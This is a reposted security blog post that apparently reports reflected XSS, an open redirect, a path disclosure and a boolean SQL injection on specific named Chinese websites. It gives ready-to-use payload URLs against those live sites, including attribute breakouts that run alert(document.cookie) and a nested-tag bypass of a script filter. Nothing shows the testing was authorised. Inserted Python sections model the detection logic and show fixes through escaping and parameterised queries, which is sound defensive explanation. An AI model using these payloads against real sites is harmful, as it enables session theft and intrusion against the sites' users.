Two XSS in China Standard Software (Zhongbiao) sites (detailed analysis)

Source: Internet
Author: User

Repost notice: reposts must credit www.anying.org

Digging up a few XSS findings.
China Standard Software XSS (the vendor of a domestically developed Chinese Linux distribution, yet its own website is not secure)
1: http://www.cs2c.com.cn/search.php?searchword=<iframe src=http://www.baidu.com>&submit=+
Enter a marker string of your own choosing on the page and look for it in the response.

 

<TR><TD align=left style="font-size:14px;font-weight:bold;text-align:center;border-bottom:1px dashed #ccc;">Search <span style="color:#FF0000">aaaaaaaaaaaa</span> for the following information:</TD></TR>


Look: aaaaaaaaaaaa comes back unchanged.
Now let's check whether anything is filtered, using a probe of special characters.

<TR><TD align=left style="font-size:14px;font-weight:bold;text-align:center;border-bottom:1px dashed #ccc;">Search <span style="color:#FF0000"><>!@#$%^&*()</span> for the following information:</TD></TR>



Look: no filtering at all. Every character of the probe, including < and >, comes back as-is, and the reflection sits in text context,
so XSS code can be entered directly.

2:

http://neocertify.cs2c.com.cn/display/webSoftIndex.do?channelId=71
Let's look at the page source to see what part of it we can control.
 
<form id="myForm" action="/display/webQueryCompatible.do"><input type="hidden" id="keyword" name="keyword" value="aaaaaaaaaaa" /><input type="hidden" id="companyId" name="companyId" value="" />



Look! aaaaaaaaaaa again, but this time inside an <input> tag: our input lands in the value attribute, not in the visible page. Think about it: what if we enter "/>?
Bingo.
The " closes the attribute value and the /> closes the <input> tag.
So what?
Whatever follows the "/> is no longer inside a tag, so the XSS code we append after it is parsed and executed as ordinary HTML.
Enter in the search box:
"/><iframe src=http://www.baidu.com>
"/><script>alert(document.cookie)</script>
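The procedure of sections 1 and 2 (reflect a marker, see which probe characters survive, then pick the breakout for the context the marker landed in) as an added Python example. This is not code from the original post: the two HTML fragments are constructed to resemble the responses shown above, and the function names and the escaped "fixed handler" are my own assumptions about how the pages work.

```python
import html

# Constructed response fragments modelled on the two pages discussed above.
# They are NOT captures from the real sites; the marker is the "aaaa..." string.
MARKER = "aaaaaaaaaaa"

SEARCH_PAGE = (
    '<TR><TD align=left style="font-size:14px;">Search '
    '<span style="color:#FF0000">' + MARKER + '</span> '
    'for the following information:</TD></TR>'
)
FORM_PAGE = (
    '<form id="myForm" action="/display/webQueryCompatible.do">'
    '<input type="hidden" id="keyword" name="keyword" value="' + MARKER + '" />'
    '<input type="hidden" id="companyId" name="companyId" value="" /></form>'
)

# Probe used in the post to see whether special characters survive.
PROBE = '<>!@#$%^&*()'


def reflection_context(page, marker):
    """Say where the marker lands: 'text', 'attr_dq', 'attr_sq', 'attr_unquoted' or None."""
    pos = page.find(marker)
    if pos < 0:
        return None
    before = page[:pos]
    lt, gt = before.rfind("<"), before.rfind(">")
    if lt > gt:                      # a '<' with no '>' after it: we are inside a tag
        tag_so_far = before[lt:]
        if tag_so_far.count('"') % 2:    # odd number of quotes: inside a "..." value
            return "attr_dq"
        if tag_so_far.count("'") % 2:
            return "attr_sq"
        return "attr_unquoted"
    return "text"


def filtered_chars(probe, reflected):
    """Characters of the probe that did not come back unchanged."""
    return sorted(c for c in probe if c not in reflected)


def breakout_payload(context, js="alert(document.cookie)"):
    """Prefix needed to leave the context before the payload is parsed as HTML."""
    prefix = {"text": "", "attr_dq": '"/>', "attr_sq": "'/>", "attr_unquoted": " />"}[context]
    return prefix + "<script>" + js + "</script>"


def render(template, marker, value, escape):
    """Substitute the user value into the page the way a vulnerable (escape=False)
    or a fixed (escape=True, attribute-safe HTML escaping) handler would."""
    out = html.escape(value, quote=True) if escape else value
    return template.replace(marker, out)


def script_tag_present(page):
    return "<script>" in page.lower()


if __name__ == "__main__":
    for name, page in (("search", SEARCH_PAGE), ("form", FORM_PAGE)):
        ctx = reflection_context(page, MARKER)
        payload = breakout_payload(ctx)
        print(name, ctx, payload)
        print("  vulnerable:", script_tag_present(render(page, MARKER, payload, escape=False)))
        print("  escaped:   ", script_tag_present(render(page, MARKER, payload, escape=True)))
```

The context check is deliberately simple (it counts quotes in the current tag); it is enough for the two pages here, where the marker lands either in element text or in a double-quoted attribute value.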



Path disclosure on the China Standard Software site
http://www.cs2c.com.cn/index.php?id=117%20-1

I won't post the path here.

Lenovo Enterprise Network Disk reflected XSS
https://token.vips100.com/checkAccessCode.php?code=%22/%3E<iframe%20src=http://www.baidu.com>&sec=true
Same old method: search the page source for the string of aaaaaaaaa
<input type="hidden" name="code" value="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" /> <input type="hidden" name="sec" value="" />
How about that?
Look, very familiar.
OK, we close the tag.
Enter "/>

We can see that our string has been output after the closed tag.
Now we enter <script>.
Hm.
Our <script> seems to be filtered:

<input type="hidden" name="code" value="" />"/> <input type="hidden" name="sec" value="" />
No need to hurry; once we know how the filter works we can bypass it. Let's enter <scr<script>ipt> and see:
<input type="hidden" name="code" value="" /><script>"/> <input type="hidden" name="sec" value="" />
The filter deletes the literal <script> exactly once and does not re-scan its own output, so the pieces on either side join back together into a <script> tag.
OK, let's go for the cookie. Enter:
"/><scr<script>ipt>alert(document.cookie)</scr<script>ipt>//
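An added Python model of the filter behaviour observed above (not the site's actual code, which the post does not show): a single-pass blacklist that drops the literal <script> once, beside a repeat-until-stable version and the real fix for this context, HTML-escaping the value. The bypass string and the iframe probe are the ones from the post; the template, function names and the filter's exact rule are assumptions.

```python
import html
import re

# Strings from the post (the bypass and the iframe probe); the template is constructed.
BYPASS = '"/><scr<script>ipt>alert(document.cookie)</scr<script>ipt>//'
IFRAME = '"/><iframe src=http://www.baidu.com>'
TEMPLATE = '<input type="hidden" name="code" value="{v}" />'


def strip_script_once(value):
    """Assumed model of the site's filter: every literal <script> or </script> is deleted
    in one left-to-right pass and the result is never re-scanned, so the fragments around
    a deleted tag can join back into a new one."""
    return re.sub(r"</?script>", "", value, flags=re.I)


def strip_script_until_stable(value):
    """Same blacklist, repeated until nothing changes. Defeats the nesting trick but is
    still a blacklist: anything that is not literally <script> goes straight through."""
    while True:
        stripped = strip_script_once(value)
        if stripped == value:
            return value
        value = stripped


def escape_for_attribute(value):
    """The actual fix for a double-quoted attribute: encode quotes and angle brackets,
    so the value can neither close the attribute nor start a tag."""
    return html.escape(value, quote=True)


def contains_script_tag(page):
    """Would a browser see a script tag (opening or closing) anywhere in this markup?"""
    return re.search(r"<\s*/?\s*script\b", page, re.I) is not None


def reflect(value, filt):
    """Put the filtered user value back into the hidden input, as the page does."""
    return TEMPLATE.format(v=filt(value))


if __name__ == "__main__":
    print(reflect(BYPASS, strip_script_once))          # <script> survives
    print(reflect(BYPASS, strip_script_until_stable))  # stripped completely
    print(reflect(IFRAME, strip_script_until_stable))  # blacklist never looked at <iframe
    print(reflect(IFRAME, escape_for_attribute))       # &quot;/&gt;&lt;iframe ... inert
```

The iframe line is the point of the "try iframe" step: a blacklist fixed to loop still lets the attribute breakout through, whereas escaping removes the whole class of breakouts regardless of the tag name.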

Try an iframe as well.


Haodf (Good Doctor) open redirect
http://www.haodf.com/msg.php?msg=&url=http://www.baidu.com

Haodf (Good Doctor) XSS
http://www.haodf.com/msg.php?msg=<script>alert(document.cookie)</script>
This one has no filtering at all.
Enter the XSS code directly.


One more
While verifying the XSS above I found a SQL injection:
http://neocertify.cs2c.com.cn/di... d=100&newsId=36
and 1=1 / and 1=2 give different responses.
But I couldn't get the table names out; I don't know why. Maybe my dictionary isn't good enough.
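An added sqlite3 example of the and 1=1 / and 1=2 test, not the target's code: the table, its rows and the function names are invented. The id is concatenated into the query the way the vulnerable page must be doing it, next to a parameterised lookup that the same test does not flag.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for whatever sits behind newsId."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(36, "release notes"), (100, "compat list"), (117, "about")])
    return con


def lookup_vulnerable(con, news_id):
    """Concatenates the raw parameter into SQL: the bug the page's test detects."""
    sql = "SELECT title FROM news WHERE id=" + news_id
    return [row[0] for row in con.execute(sql)]


def lookup_safe(con, news_id):
    """Parameterised version. A non-numeric id is rejected; the empty list stands in
    for the error page a real handler would return."""
    try:
        value = int(news_id)
    except ValueError:
        return []
    return [row[0] for row in con.execute("SELECT title FROM news WHERE id=?", (value,))]


def boolean_sqli_check(fetch, base_value):
    """The and 1=1 / and 1=2 test from the post: the parameter is injectable when the
    true condition leaves the response unchanged and the false condition changes it."""
    baseline = fetch(base_value)
    true_case = fetch(base_value + " and 1=1")
    false_case = fetch(base_value + " and 1=2")
    return baseline == true_case and baseline != false_case


if __name__ == "__main__":
    con = make_db()
    print("vulnerable:", boolean_sqli_check(lambda v: lookup_vulnerable(con, v), "36"))
    print("safe:      ", boolean_sqli_check(lambda v: lookup_safe(con, v), "36"))
    # Arithmetic in the parameter is evaluated by the database, which is what the
    # id=117 -1 probe earlier on the page relies on: it selects row 116, not 117.
    print(lookup_vulnerable(con, "117 -1"))
```

On the parameterised lookup both the true and the false case hit the ValueError path and come back identical to each other but different from the baseline, so the check correctly reports no injection.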


